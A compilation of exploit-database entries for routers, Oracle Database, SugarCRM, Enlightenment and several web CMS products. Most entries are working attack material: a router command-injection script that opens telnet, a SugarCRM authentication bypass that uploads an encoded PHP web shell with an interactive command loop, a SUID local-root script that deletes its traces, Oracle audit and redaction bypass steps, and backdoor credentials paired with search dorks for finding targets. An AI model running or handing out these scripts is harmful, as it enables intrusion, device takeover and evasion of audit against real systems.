<pre><code># Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 19/10/2022<br /># Exploit Author: Yerodin Richards<br /># Vendor Homepage: https://www.nexxtsolutions.com/<br /># Version: 42.103.1.5095<br /># Tested on: ARN02304U8<br /># CVE : CVE-2022-44149<br /><br />import requests<br />import base64<br /><br />router_host = "http://192.168.1.1"<br />username = "admin"<br />password = "admin"<br /><br /><br />def main():<br /> send_payload("&telnetd")<br /> print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")<br /> pass<br /><br />def gen_header(u, p):<br /> return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")<br /><br />def send_payload(payload):<br /> url = router_host+"/goform/sysTools"<br /> headers = {"Authorization": "Basic {}".format(gen_header(username, password))}<br /> params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}<br /> requests.post(url, headers=headers, data=params)<br /><br /><br />if __name__ == '__main__':<br /> main()<br /></code></pre>
<pre><code>Title: ByPassing DBMS_REDACT Dynamic Data Masking security feature in Oracle database system<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 19c,21c<br />Tested Version(s): 19c,21c<br />CVE Reference: N/A<br />Author of Advisory: Emad Al-Mousa<br /><br />Overview:<br /><br />DBMS_REDACT package provides an interface to Oracle Data Redaction, which enables you to mask (redact) data that is returned from SQL queries. Basically, its dynamic data masking. security policies are configured and enabled through dbms_redact package. <br /><br />This is a security feature but doesn't provide a bullet proof data protection, as I will simulate how easily it can be bypassed and masked datacan be extracted/viewed.<br /><br />**************************************************<br />Proof of Concept (PoC):<br />In the database I will create a table called HR.TABLE2 and will create an index on SALES column and insert dummy tables.<br /><br />SQL> CREATE TABLE HR.TABLE2( COMPANY_NAME VARCHAR2(10 BYTE), REGION VARCHAR2(10 BYTE), SALES NUMBER(12), DIVISION_NAME VARCHAR2(12)); <br />SQL> CREATE INDEX HR.IDX_TABLE2_SALES ON HR.TABLE2(SALES);<br /><br />SQL> Insert into HR.TABLE2 values ('COMPANY_A','EU',120000000,'INDUSTRIAL');<br />SQL> Insert into HR.TABLE2 values ('COMPANY_B','ASIA',170000000,'RETAIL');<br />SQL> Insert into HR.TABLE2 values ('COMPANY_C','ME',40000000,'SHIPMENT');<br />SQL> Insert into HR.TABLE2 values ('COMPANY_D','AFRICA',11000000,'FARMING');<br />SQL> Insert into HR.TABLE2 values ('COMPANY_E','LATIN-AM',114000000,'SHIPMENT');<br />SQL> Insert into HR.TABLE2 values ('COMPANY_F','NORTH-AM',190000000,'RETAIL');<br />SQL> commit;<br /><br />I will create a redaction policy as SYS user against “SALES” column in the table HR.TABLE2:<br />sqlplus / as sysdba<br />SQL> begin dbms_redact.add_policy( object_schema => 'HR', object_name => 'TABLE2', column_name => 'SALES', policy_name => 'REDACT_HR_SALES', function_type => DBMS_REDACT.FULL, expression => '1=1'); end;/ <br /><br />I will create a user called "roro" in the pluggable database ORCLPDB1 with “create session” and "SELECT" permission ONLY on the table:<br />sqlplus / as sysdba<br />SQL> alter session set container=ORCLPDB1;SQL> create user roro identified by dummy_123;SQL> grant select on HR.TABLE2 to roro;<br /><br />connecting using account roro to the database using "SQL Developer Tool" or SQLCL and execute the following command:<br />info+ HR.TABLE2;<br /><br />The histogram data for SALES column will show the actual vaules stored in the redacted column.<br />Conclusion: So the security feature was bypassed with no excessive privileges required to be granted to the database account, I utilized the info+ command only.<br /><br />**************************************************<br />References:<br />https://docs.oracle.com/database/121/ASOAG/introduction-to-oracle-data-redaction.htm#ASOAG852<br />https://databasesecurityninja.wordpress.com/2023/01/03/bypassing-dbms_redact-dynamic-data-masking-security-feature-in-oracle-database-system/<br /><br />Thanks,Emad<br /></code></pre>
<pre><code>Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPass<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 12.1.0.2, 12.2.0.1, 19c<br />Tested Version(s): 19c<br />Risk Level: low<br />Solution Status: Fixed<br />Manufacturer Notification: 2021-03-17<br />Solution Date: 2021-10-17<br />Public Disclosure: 2022-06-11<br />CVE Reference: CVE-2021-35576<br />Author of Advisory: Emad Al-Mousa<br /><br />Overview:<br />Oracle Database is a general purpose relational database management system (RDMBS).<br />Unified Auditing is the supported mechanism to capture database audit logs. The unified audit trail captures audit information from a variety of sources.The unified audit trail, which resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, makes this information available in a uniform format in the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, then grant them the AUDIT_VIEWER role.<br /><br /><br />*****************************************<br />Vulnerability Details:<br />The vulnerability will allow database administrator or system admin with access to the database server (either local login or remote authentication)to bypass a custom in-place audit policy defined in the oracle database system. Moreover, setting the database in upgrade mode will disable auditingand threat actor can perform malicious operations without detection.<br /><br />*****************************************<br />Proof of Concept (PoC):<br />I will create a table in pluggable database PDB1 under HR schema and insert few records:<br />SQL> CREATE TABLE HR.EMPLOYEE<br />(<br /> FIRST_NAME VARCHAR2(50),<br /> LAST_NAME VARCHAR2(50)<br />);<br />SQL> INSERT INTO HR.EMPLOYEE (<br /> FIRST_NAME, LAST_NAME)<br />VALUES ( 'EMAD','MOUSA' );<br />SQL> commit;<br /><br /><br />SQL> INSERT INTO HR.EMPLOYEE (<br /> FIRST_NAME, LAST_NAME)<br />VALUES ( 'SAMI','MOUSA' );<br />SQL> commit;<br />I will now create audit policy:<br />SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;<br />SQL> audit policy SELECT_P1;<br />To check audit policies configured in PDB1 database:<br />SQL> SELECT * FROM audit_unified_enabled_policies;<br /><br />Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode:<br />sqlplus / as sysdba<br />SQL> alter session set container=PDB1;<br />SQL> shutdown immediate;<br />SQL> startup upgrade;<br />SQL> select * from HR.EMPLOYEE;<br />SQL> startup force;<br />SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;<br /><br /><br />Checking the audit logs using the query, NO entry is found recorded in the unified audit trail:<br /><br />SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc;<br />So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view !<br />*****************************************<br />References:<br />https://www.oracle.com/security-alerts/cpuoct2021.html <br />https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/<br />https://nvd.nist.gov/vuln/detail/CVE-2021-35576<br /><br />Credit:<br />Emad Al-Mousa: CVE-2021-35576<br /></code></pre>
<pre><code>#!/usr/bin/env python<br />#<br /># SugarCRM 0-day Auth Bypass + RCE Exploit<br />#<br /># Dorks:<br /># https://www.google.com/search?q=site:sugarondemand.com&filter=0<br /># https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php<br /># https://www.shodan.io/search?query=http.title:"SugarCRM"<br /># https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM"<br /># https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com"<br /><br />import base64, re, requests, sys, uuid<br /><br />requests.packages.urllib3.disable_warnings()<br /><br />if len(sys.argv) != 2:<br /> sys.exit("Usage: %s [URL]" % sys.argv[0])<br /> <br />print "[+] Sending authentication request"<br /><br />url = sys.argv[1] + "/index.php"<br />session = {"PHPSESSID": str(uuid.uuid4())}<br />params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}<br /><br />requests.post(url, cookies=session, data=params, verify=False)<br /><br />print "[+] Uploading PHP shell\n"<br /><br />png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC"<br />upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtml<br />params = {"module": "EmailTemplates", "action": "AttachFiles"}<br /><br />requests.post(url, cookies=session, data=params, files=upload, verify=False)<br /><br />url = sys.argv[1] + "/cache/images/sweet.phar"<br /><br />while True:<br /> cmd = raw_input("# ")<br /> res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False)<br /> res = re.search("#####(.*)#####", res.text, re.DOTALL)<br /> if res:<br /> print res.group(1)<br /> else:<br /> sys.exit("\n[+] Failure!\n")<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : BDWeb-Link Lms v1.11.5 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://bdweblink.com | <br />| # Dork : Developed by Developed by BD Web Link |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] http://127.0.0.1/single-page.php?id=71 <====| inject here<br /><br />[+] https://127.0.0.1/Dashboard <====| Login<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code><br />Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting<br /><br /><br />Vendor: Hughes Network Systems, LLC<br />Product web page: https://www.hughes.com<br />Affected version: HX200 v8.3.1.14<br /> HX90 v6.11.0.5<br /> HX50L v6.10.0.18<br /> HN9460 v8.2.0.48<br /> HN7000S v6.9.0.37<br /><br />Summary: The HX200 is a high-performance satellite router designed to<br />provide carrier-grade IP services using dynamically assigned high-bandwidth<br />satellite IP connectivity. The HX200 satellite router provides flexible<br />Quality of Service (QoS) features that can be tailored to the network<br />applications at each individual remote router, such as Adaptive Constant<br />Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter<br />bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.<br />With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,<br />and DNS Server/Relay functionality, together with a high-performance<br />satellite modem, the HX200 is a full-featured IP Router with an integrated<br />high-performance satellite router. The HX200 enables high- performance<br />IP connectivity for a variety of applications including cellular backhaul,<br />MPLS extension services, virtual leased line, mobile services and other<br />high-bandwidth solutions.<br /><br />Desc: The router contains a cross-frame scripting via remote file inclusion<br />vulnerability that may potentially be exploited by malicious users to compromise<br />an affected system. This vulnerability may allow an unauthenticated malicious<br />user to misuse frames, include JS/HTML code and steal sensitive information<br />from legitimate users of the application.<br /><br />Tested on: WindWeb/1.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5743<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php<br /><br /><br />23.12.2022<br /><br />--<br /><br /><br />snippet:///XFSRFI<br />//<br />// Hughes Satellite Router RFI/XFS PoC Exploit<br />// by lqwrm 2022<br />//<br /><br />//URL http://TARGET/fs/dynaform/speedtest.html<br />//Reload target<br />//window.location.reload()<br /><br />console.log("Loading Broadband Satellite Browsing Test");<br /><br />//Add cross-frame file include (http only)<br />AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");<br /><br />console.log("Calling StartTest()");<br />StartTest()<br /><br />//console.log("Calling DoTest()");<br />//DoTest()<br /><br />//Unload weapon<br />//document.getElementById("URLList").remove();<br /></code></pre>
<pre><code># Exploit Title: Router backdoor - ProLink PRS1841 PLDT Home fiber<br /># Exploit Author: Lawrence Amer @zux0x3a<br /># Vendor Homepage: https://prolink2u.com/product/prs1841/<br /># Firmware : PRS1841 U V2<br /># reference: https://0xsp.com/security%20research%20%20development%20srd/backdoor-discovered-in-pldt-home-fiber-routers/<br /><br />Description<br />========================<br />A silent privileged backdoor account discovered on the Prolink PRS1841 <br />routers; allows attackers to gain command execution privileges to the <br />router OS.<br /><br />The vulnerable account issued by the vendor was identified as "adsl" and <br />"realtek" as the default password; attackers could use this account to <br />access the router remotely/internally using either Telnet or FTP <br />protocol.<br /><br />PoC<br />=============================<br />adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/cli<br /><br /></code></pre>
<pre><code>## Title: Enlightenment Version: 0.25.3 LPE<br />## Author: nu11secur1ty<br />## Date: 12.26.2022<br />## Vendor: https://www.enlightenment.org/<br />## Software: https://www.enlightenment.org/download<br />## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706<br /><br />## Description:<br />The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.<br />Enlightenment_sys in Enlightenment before 0.25.4 allows local users to<br />gain privileges because it is setuid root,<br />and the system library function mishandles pathnames that begin with a<br />/dev/.. substring<br />If the attacker has access locally to some machine on which the<br />machine is installed Enlightenment<br />he can use this vulnerability to do very dangerous stuff.<br /><br />## STATUS: CRITICAL Vulnerability<br /><br />## Tested on:<br />```bash<br />DISTRIB_ID=Ubuntu<br />DISTRIB_RELEASE=22.10<br />DISTRIB_CODENAME=kinetic<br />DISTRIB_DESCRIPTION="Ubuntu 22.10"<br />PRETTY_NAME="Ubuntu 22.10"<br />NAME="Ubuntu"<br />VERSION_ID="22.10"<br />VERSION="22.10 (Kinetic Kudu)"<br />VERSION_CODENAME=kinetic<br />ID=ubuntu<br />ID_LIKE=debian<br />HOME_URL="https://www.ubuntu.com/"<br />SUPPORT_URL="https://help.ubuntu.com/"<br />BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"<br />PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"<br />UBUNTU_CODENAME=kinetic<br />LOGO=ubuntu-logo<br />```<br /><br />[+] Exploit:<br /><br />```bash<br />#!/usr/bin/bash<br /># Idea by MaherAzzouz<br /># Development by nu11secur1ty<br /><br />echo "CVE-2022-37706"<br />echo "[*] Trying to find the vulnerable SUID file..."<br />echo "[*] This may take few seconds..."<br /><br /># The actual problem<br />file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)<br />if [[ -z ${file} ]]<br />then<br /> echo "[-] Couldn't find the vulnerable SUID file..."<br /> echo "[*] Enlightenment should be installed on your system."<br /> exit 1<br />fi<br /><br />echo "[+] Vulnerable SUID binary found!"<br />echo "[+] Trying to pop a root shell!"<br />mkdir -p /tmp/net<br />mkdir -p "/dev/../tmp/;/tmp/exploit"<br /><br />echo "/bin/sh" > /tmp/exploit<br />chmod a+x /tmp/exploit<br />echo "[+] Welcome to the rabbit hole :)"<br /><br />${file} /bin/mount -o<br />noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),<br />"/dev/../tmp/;/tmp/exploit" /tmp///net<br /><br />read -p "Press any key to clean the evedence..."<br />echo -e "Please wait... "<br /><br />sleep 5<br />rm -rf /tmp/exploit<br />rm -rf /tmp/net<br />echo -e "Done; Everything is clear ;)"<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)<br />## Proof and Exploit:<br />[href](https://streamable.com/zflbgg)<br /><br />## Time spent<br />`01:00:00`<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : COURIER DEPRIXA V2.5 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin & pass=09731 <br /><br />[+] https://deprixalogistics.online/dashboard/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>=======================================================================================================================================================================================<br />| # Title : consultine consulting business and finance website cms v1.8 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://codecanyon.net/item/consultine-consulting-business-and-finance-website-cms/22236735 | <br />| # Dork : About Us Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex enim concludaturque. Senserit salutandi euripidis no per, modus maiestatis scribentur est an.|<br />=======================================================================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin@gmail.com & pass=1234 <br /><br />[+] https://www.seusite.top/jornal/admin/<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>